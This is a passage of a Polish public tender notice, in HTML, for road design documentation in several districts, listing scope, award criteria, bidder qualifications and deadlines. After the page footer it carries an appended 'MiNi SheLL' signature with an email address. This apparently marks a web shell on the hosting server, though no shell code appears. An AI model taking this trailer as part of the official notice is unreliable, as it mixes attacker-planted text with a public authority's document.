projektu, czynności tepowinny być wykonane przez Projektanta w ciągu 3 dni od powdowienia i na koszt Wykonawcyprojektu.bb) Dokumentacja projektowa powinna być poprawna pod względem technicznym zuwzględnieniem ekonomicznych aspektów stosowania rozwiązań technicznych. cc) Wykonawcabędzie zobowiązany do sprawowania nadzoru autorskiego oraz do bezpłatnego odnowieniawygasłych uzgodnień, które stracą swoją ważność w okresie gwarancji od momentu uzyskaniadecyzji pozwolenie na budowę, niewniesienia sprzeciwu od zgłoszenia etc. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">238 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta w specjalności drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi powiatowej Nr 2709W w miejscowości Żanęcin, Dziechciniec i Malcanówa)przedmiotem opracowania jest obustronne wykonanie dojść do wprowadzonych do projektustałej organizacji ruchu przejść dla pieszych zlokalizowanych w miejscowości Żanęcin,Dziechciniec i Malcanów – opracowanie projektu w oparciu o posiadany przez Zamawiającegoprojekt stałej organizacji ruchu,b) konstrukcie nawierzchni chodnika należy uzgodnić zzamawiającym,c) opracowanie należy wykonać w granicach działek drogowych,d)zaprojektowanie odwodnienia – zamawiający rekomenduje odwodnienie z wykorzystaniemistniejących rowów (wpusty z jezdni do rowów)e) uzyskać w imieniu Zamawiającegozaświadczenie o nie wniesieniu sprzeciwu do zgłoszenia lub pozwolenie na budowę f) w ramachzamówienia należy opracować wszystkie niezbędne materiały i uzyskać wszystkie uzgodnieniado pozwolenia na budowę,g) koszt uzgodnień, w tym opłata za pozwolenie wodnoprawne ponosiwykonawca dokumentacji,h) tytuł projektu budowlanego, w porozumieniu z Zamawiającym orazw uzgodnieniu z Wydziałem Architektury i Budownictwai) przedmiot zamówienia należywykonać zgodnie z obowiązującymi przepisami prawa oraz musi być kompletna z punktuwidzenia celu, któremu ma służyć potwierdzone oświadczeniem wykonawcyj) dokumentacjawinna zwierać w oryginale plus kopie wszystkich wymaganych prawem uzgodnień, opinii izezwoleńk) wykonawca zobowiązany jest w terminie 5 tygodni od daty podpisania umowyprzedstawić koncepcje w wersji papierowej zawierającej rozwiązania sytuacyjne i wysokościowe(zagospodarowanie terenu, profil podłużny, normalny, poprzeczny), a w przypadku gdy zadaniebędzie realizowane na podstawie decyzji ZRiD zobowiązany jest do przedłożenia propozycjipodziału działek l) wykonawca zobowiązany jest do przedłożenia w szczególności:- aktualnąmapę do celów projektowych w ilości 1 egz.- decyzji o środowiskowych uwarunkowaniach dlarealizacji przedsięwzięcia wraz z uzyskaniem decyzji w ilości 1egz.- zaświadczenia o niewniesieniu sprzeciwu do zgłoszenia, pozwolenie na budowę lub decyzji zezwalającą narealizację inwestycji drogowej w ilości 1 egz.- projektu budowlanego w ilości 5 egz.- projektwykonawczy dla branży drogowej w ilości 5 egz.- projekt wykonawczy dla przebudowywanychistniejących urządzeń obcych w przypadku zaistnienia kolizji z podziałam na poszczególnebranże w ilości 5 egz.- przedmiary robót w ilości 2 egz.- kosztorys inwestorski w ilości 2 egz. -szczegółową specyfikacja techniczna w ilości 3 egz. - inwentaryzacja zieleni i gospodarkidrzewostanem w ilości 2 egz.- warunków gruntowo – wodnych (geotechnika) w ilości 3 egz.-projekt stałej organizacji ruchu wraz z zatwierdzeniem w ilości 4 egz.- całej dokumentacji wwersji elektronicznej na nośniku zewnętrznym – pendrive edytowalna odczytywalna przezprogram MS Offfice i nie edytowalna do celów przetargowych na roboty budowlane (.pdf) orazplików dwg lub dvf- oryginału zaświadczenia o nie wniesieniu sprzeciwu do zbożnego zgłoszeniarobót budowlanych lub decyzji pozwalającej na budowę wraz z załącznikami lub decyzjizezwalającej na realizację inwestycji drogowej m) Wykonawca zobowiązany jest do uzyskaniawszystkich wymaganych odpowiednimi przepisami szczególnymi, pozwoleń, uzgodnień, opinii,dokumentów w oryginale – koszt uzyskania niezbędnych uzgodnień wykonawca zobowiązanyjest w liczyć w cenę zrealizowanego zadnia n) dokumentacja w wersji elektronicznej musizawierać projekty, opinie, uzgodnienia, wnioski zatwierdzone przez odpowiedni organ,o)dokumentacja musi zawierać w oryginale plus kopie wszystkie wymagane przepisamiuzgodnienia, opinii i zezwolenia,p) wykonawca zobowiązany jest do bieżącej informacjiZamawiającego o postępach prac, napotkanych problemach, w szczególności przedłużającej sięprocedury uzyskania opinii, uzgodnienia o 7 dni od daty ustawowego terminu ich uzyskaniaq)zamawiający zastrzega sobie prawo do używania i sporządzania kopii elementów dokumentacjidla celów procedury przetargowej, bez uzyskania zezwolenia jednostki projektowej przyzachowaniu praw autorskich do opracowanego przez siebie projektu Wykonawcyr) W przypadkubraku konieczności wykonania wyspecyfikowanych w zamówieniu opracowań pozycję te niezostaną opłacone, lecz nie zwalnia to projektanta z obowiązku dokonania właściwej analizy s) Wprzypadku stwierdzenia w czasie realizacji robót, że elementy opracowanej dokumentacja sąniezgodne ze stanem faktycznym lub nie dają się zrealizować wg tej dokumentacji oraz wymagato przyjazdu projektanta i dokonania korekty projektu, czynności te powinny być wykonane przez Projektanta w ciągu 3 dni od powdowienia i na koszt Wykonawcy projektu.t) Dokumentacjaprojektowa powinna być poprawna pod względem technicznym z uwzględnieniemekonomicznych aspektów stosowania rozwiązań technicznych. u) Wykonawca będziezobowiązany do sprawowania nadzoru autorskiego oraz do bezpłatnego odnowienia wygasłychuzgodnień, które stracą swoją ważność w okresie gwarancji od momentu uzyskania decyzjipozwolenie na budowę, niewniesienia sprzeciwu od zgłoszenia etc. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">91 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta w specjalności drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Dla części I - 1) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegająwykluczeniu oraz spełniają warunki udziału w postępowaniu.2) O udzielenie zamówienia mogąubiegać się Wykonawcy, którzy spełnią warunki dotyczące:a) zdolności technicznej izawodowej:Wykonawca spełni warunek, jeżeli wykaże że:a) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tymokresie, wykonał (zakończone usługi), co najmniej dwie dokumentacje projektowe przebudowy/budowy/ rozbudowy drogi kategorii min. Z o długości min. 800 m i informację o tym, czy usługazostała wykonana zgodnie z umową, wraz z podaniem ich wartości, przedmiotu, dat wykonania ipodmiotów, na rzecz których usługa została wykonane, przy czym dowodami, o których mowa,są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi byływykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jestw stanie uzyskać tych dokumentów - inne dokumenty b) dysponuje lub będzie dysponowałosobą, którą skieruje do realizacji niniejszego zamówienia, jako projektanta posiadającegouprawnienia do projektowania (bez ograniczeń) w specjalności drogi w rozumieniu ustawy z dnia7 lipca 1994 r. Prawo budowlane (Dz. U. z 2020 r. poz. 1333 ze. zm.) lub odpowiadające imuprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów alboodpowiadające im kwalifikację zawodowe, które zostały uznane na zasadach określonych wprzepisach odrębnych, która wykonała min. 2 dokumentacje projektowe dotyczące budowy/przebudowy lub rozbudowy drogi min. klasy Z o długości min. 800 m c) dysponuje lub będziedysponował osobą, którą skieruje do realizacji niniejszego zamówienia, jako projektantaposiadającego uprawnienia do projektowania (bez ograniczeń) w specjalności instalacyjnej wzakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w rozumieniu ustawy zdnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2020 r. poz. 1333 ze. zm.) lub odpowiadające imuprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów alboodpowiadające im kwalifikację zawodowe, które zostały uznane na zasadach określonych wprzepisach odrębnych, d) dysponuje lub będzie dysponował osobą, którą skieruje do realizacjininiejszego zamówienia, jako projektanta posiadającego uprawnienia do projektowania (bezograniczeń) w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeńtlekomunikacyjnych w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2020r. poz. 1333 ze. zm.) lub odpowiadające im uprawnienia budowlane wydane na podstawiewcześniej obowiązujących przepisów albo odpowiadające im kwalifikację zawodowe, którezostały uznane na zasadach określonych w przepisach odrębnych, Dla części II -1) O udzieleniezamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniająwarunki udziału w postępowaniu.2) O udzielenie zamówienia mogą ubiegać się Wykonawcy,którzy spełnią warunki dotyczące:d) zdolności technicznej i zawodowej:Wykonawca spełniwarunek, jeżeli wykaże że:a) w okresie ostatnich 3 lat przed upływem terminu składania ofert, ajeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał (zakończone usługi),co najmniej dwie dokumentacje projektowe przebudowy/ budowy/ rozbudowy drogi kategoriimin. Z o długości min. 800 m i informację o tym, czy usługa została wykonana zgodnie z umową,wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługazostała wykonane, przy czym dowodami, o których mowa, są referencje bądź inne dokumentywystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionejprzyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów -inne dokumenty b) dysponuje lub będzie dysponował osobą, którą skieruje do realizacjininiejszego zamówienia, jako projektanta posiadającego uprawnienia do projektowania (bezograniczeń) w specjalności drogi w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane(Dz. U. z 2020 r. poz. 1333 ze. zm.) lub odpowiadające im uprawnienia budowlane wydane napodstawie wcześniej obowiązujących przepisów albo odpowiadające im kwalifikację zawodowe,które zostały uznane na zasadach określonych w przepisach odrębnych, która wykonała min. 2dokumentacje projektowe dotyczące budowy/ przebudowy lub rozbudowy drogi min. klasy Z odługości min. 800 m Dla części III - 1) O udzielenie zamówienia mogą ubiegać się Wykonawcy,którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu.2) O udzieleniezamówienia mogą ubiegać się Wykonawcy, którzy spełnią warunki dotyczące:d) zdolnościtechnicznej i zawodowej:Wykonawca spełni warunek, jeżeli wykaże że:a) w okresie ostatnich 3lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie, wykonał (zakończone usługi), co najmniej dwie dokumentacje projektoweprzebudowy/ budowy/ rozbudowy drogi kategorii min. Z i informację o tym, czy usługa zostaławykonana zgodnie z umową, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługa została wykonane, przy czym dowodami, o których mowa,są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi byływykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jestw stanie uzyskać tych dokumentów - inne dokumenty b) dysponuje lub będzie dysponowałosobą, którą skieruje do realizacji niniejszego zamówienia, jako projektanta posiadającegouprawnienia do projektowania (bez ograniczeń) w specjalności drogi w rozumieniu ustawy z dnia7 lipca 1994 r. Prawo budowlane (Dz. U. z 2020 r. poz. 1333 ze. zm.) lub odpowiadające imuprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów alboodpowiadające im kwalifikację zawodowe, które zostały uznane na zasadach określonych wprzepisach odrębnych, która wykonała min. 2 dokumentacje projektowe dotyczące budowy/przebudowy lub rozbudowy drogi min. klasy Z <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">b) wykaz usług wykonanych w okresie ostatnich trzech lat przed upływemterminu składania oferta jeżeli okres działalności jest krótszy- w tym okresie, wraz z podaniem ichwartości, przedmiotu, dat wykonania i podmiotu, na rzecz których dostawy zostały wykonane, orazzałączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie,przy czym dowodami, o których mowa, są referencję bądź inne dokumenty wystawione przez podmiot,na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych sąwykonywane a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest wstanie uzyskać tych dokumentów - inne dokumenty w przypadku świadczeń okresowych lub ciągłychnadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinnybyć wydane nie wcześniej niż trzy miesiące przed upływem terminu składania ofert albo wniosku odopuszczenie do udziału w postepowaniu – załącznik do SWZ c) wykaz osób skierowanych przezwykonawcę do realizacji zamówienia publicznego w szczególności odpowiedzialnych za świadczenieusługi wraz z informacjami na temat ich uprawień i doświadczenia niezbędnych do wykonaniazamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacji opodstawie do dysponowania tymi osobami – załącznik do SWZd) oświadczenie, że osoby wymienionew wykazie osób skierowanych przez wykonawcę do realizacji zamówienia publicznego spełniająwarunki określone przez Zamawiającego w odniesieniu do danej części</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu o którym mowa w art.125 ust. 1 ustawy w zakresie art. 108 ust .1 pkt 3, 4, 5, 6 podstaw wykluczenia z postępowania.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia oniepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu składa każdy zwykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnieniawarunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunkówudziału w postępowaniu. Wykonawcy wspólnie ubiegający się o udzielenie zamówieniadołączają do oferty oświadczenie z którego wynika, które elementy dostawy wykonują poszczególni wykonawcy. Oświadczenia i dokumenty potwierdzające brak podstawdowykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się ozamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany niniejszej umowy wymagają dla swojej ważności formy pisemnej podrygorem nieważności i będą dopuszczalne w granicach unormowania art. 455 ustawy Prawozamówień publicznych (Dz. U. z 2019 poz. 2019 z późn. zm.).2. Zabawiający również dopuszczazmiany Umowy w zakresie:1) wystąpienia zmian powszechnie obowiązujących przepisów prawaw zakresie mającym wpływ na realizację przedmiotu umowy.2) wynikających rozbieżności lubniejasności w rozumieniu pojęć użytych w Umowie, których nie można usunąć w innych sposób,a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celujednoznacznej interpretacji jej zapisów przez strony. 3) wystąpienia siły wyższejuniemożliwiającej wykonanie przedmiotu Umowy zgodnie ze szczegółowym opisem.4) zmianyterminu końcowego wykonania Umowy, w przypadku zasinienia sytuacji, o której mowa w § 3ust. 9.5) zmiany obowiązującej stawki podatku VAT. 3. Jednostka projektowa może żądaćzmiany terminu wykonania dokumentacji projektowej, jeżeli Zmawiający zmieni w sposób istotnyprzedmiot umowy lub zmieni dane, na podstawie których Jednostka projektowa wykonujedokumentację, a niemożliwe staje się wykonanie przedmiotu umowy w terminie wyznaczonym wumowie. 4. Niedopuszczalna jest pod rygorem nieważności zmiana postanowień zawartejumowy oraz wprowadzenia nowych postanowień do umowy niekorzystnych dla Zamawiającego,jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie której dokonanowyboru Jednostki projektowej, chyba, że konieczność wprowadzenia takich zmian wynika zokoliczności, których nie można było przewidzieć w chwili zawarcia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-04-22 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://www.soldea.pl/epz/epz/indexpostepowaniazamawiajacy.php?s=0cffc2ec8e87e77abda1045b6a821b7c531ee3d0</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-04-22 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-05-27</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-04-14 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com